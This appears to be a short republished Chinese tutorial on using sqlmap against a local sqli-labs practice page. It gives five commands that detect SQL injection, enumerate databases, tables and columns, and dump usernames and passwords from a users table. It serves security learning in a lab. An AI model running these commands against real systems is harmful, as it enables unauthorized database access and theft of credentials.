sqlmap 扫描注入漏洞

Posted 2021-02-14 Python研究者

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了sqlmap 扫描注入漏洞相关的知识，希望对你有一定的参考价值。

 1 1、检测是否存在漏洞：
 2 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3
 3 2、获取数据库信息：
 4 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 --dbs
 5 3、数据库表信息：
 6 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 -D security --tables
 7 4、表中字段信息
 8 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns
 9 5、字段值数据
10 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump

以上是关于sqlmap 扫描注入漏洞的主要内容，如果未能解决你的问题，请参考以下文章

使用sqlmap对某php网站进行注入实战及安全防范

Burpsuite+sqlmap批量扫描sql漏洞

Sqlmap

SQLMap入门

sqlmap详解

sqlmap批量扫描burpsuite请求日志记录